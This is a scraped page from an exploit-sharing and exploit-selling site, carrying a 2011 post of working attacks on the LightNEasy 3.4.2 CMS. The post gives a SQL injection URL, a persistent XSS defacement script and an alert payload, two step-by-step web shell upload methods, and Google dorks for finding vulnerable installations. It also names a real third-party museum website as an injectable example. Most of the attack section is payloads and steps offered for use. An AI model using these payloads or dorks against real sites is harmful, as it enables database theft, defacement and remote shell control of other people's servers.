0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
LightNEasy 3.4.2 Multiple Vulnerabilities
========================================================================= LightNEasy 3.4.2 Multiple Vulnerabilities ========================================================================= :-------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : LightNEasy 3.4.2 Multiple Vulnerabilities : # Date : 05 November 2011 : # Author : X-Cisadane : # Software Link : http://www.lightneasy.org/downloads.php : # Version : 3.4.2 : # Category : Web Applications : # Vulnerability : SQL Injection, Persistent XSS & Upload Shell : # Tested On : Google Chrome 14.0.835 (Windows) : # Dorks : inurl:LightNEasy.php?page OR intext:Powered by LightNEasy : # Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, Winda Utari :-------------------------------------------------------------------------------------------------------------------------: POC : 1.SQL Injection Vulnerability - Open Victim Website : http://<site>/<LightNEasy Installation Path>/LightNEasy.php?page=news&id='1 Example : http://demo.lightneasy.org/LightNEasy.php?page=news&id='1 http://lightneasy.org/demo/LightNEasy.php?page=news&id='1 http://www.houstonbicyclemuseum.org/LightNEasy.php?page=news&id='1 2.Persistent XSS Vulnerability - Open Victim Website : http://<site>/<LightNEasy Installation Path>/LightNEasy.php?page=news - Fill The Comment With This Script : <script>document.body.innerHTML="<h1>XSS Defacing</h1>This Site Has XSSed By : X-Cisadane<br/>Greetz To : XCode, Hacker Cisadane, Depok Cyber, Muslim Hackers, Dunia Santai, Borneo Crew, Jiban Crew, etc<br/>Please patch your system";</script> - ReOpen The URL (http://<site>/<LightNEasy Installation Path>/LightNEasy.php?page=news) Pic : http://i40.tinypic.com/1zdw74j.png 3.Persistent XSS Vulnerability (Required Admin Previlleges!) - Logon As Admin & Go To : http://<site>/<LightNEasy Installation Path>/LightNEasy.php?page=index&do=survey - Fill Survey Name Field, With This Script : <script>alert("xss")</script> - ReOpen The URL (http://<site>/<LightNEasy Installation Path>/LightNEasy.php?page=index&do=survey) Pic : http://i44.tinypic.com/5nk7xu.png 4.Upload Shell Vulnerability (Required Admin Previlleges!) - Logon As Admin & Go To : http://<site>/<LightNEasy Installation Path>/LightNEasy.php?page=index&do=gallery - Create Gallery. Gallery Name : Test (For Example). - Upload Image. Image Name : Shell.jpg. Choose File (Browse Your Shell.php). Upload To Gallery : Test (For Example). Click Upload Image. - Voila! Open URL : http://<site>/<LightNEasy Installation Path>/galeries/GALLERY NAME HERE/YOUR SHELL.PHP HERE Example : http://localhost/webtest/galeries/test/c100shell.php Pic : http://i44.tinypic.com/v63v2q.png 5.Upload Shell Vulnerability (Required Admin Previlleges!) - Logon As Admin & Go To : http://<site>/<LightNEasy Installation Path>/LightNEasy.php?page=index&do=downloads - Fill Downloads Name : Shell.jpg. Then Upload Your File, Choose File (Browse Your Shell.php). Fill File Name : Shell.jpg (For Example). Then Scroll Down On The Options, Select : Downloads. Finally Click Add Download! - Voila! Open URL : http://<site>/<LightNEasy Installation Path>/downloads/YOUR SHELL.PHP HERE Example : http://localhost/webtest/downloads/c100shell.php -= Regards =- Dwi X-Cisadane # 0day.today [2024-12-25] #